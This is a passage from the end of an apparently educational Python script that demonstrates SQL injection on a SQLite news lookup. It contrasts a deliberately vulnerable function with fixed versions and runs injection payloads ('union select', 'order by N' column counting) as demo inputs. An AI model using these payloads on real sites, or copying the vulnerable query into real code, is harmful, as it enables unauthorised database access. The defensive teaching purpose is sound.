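    the tutorial's 'order by N' column counting reads off the page."""
    try:
        view_news_vulnerable(conn, raw_id)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_demo_db()
    print(view_news_vulnerable(db, "828"))
    print(view_news_vulnerable(db, "-828 union select 1,2,3--"))  # attacker-chosen row
    print(view_news_fixed(db, "-828 union select 1,2,3--"))       # [] : rejected
    print(view_news_fixed(db, "828 order by 9"))                  # [] : no error signal either
    print(view_news_by_slug_fixed(db, "site-news' order by 1000--"))  # []
```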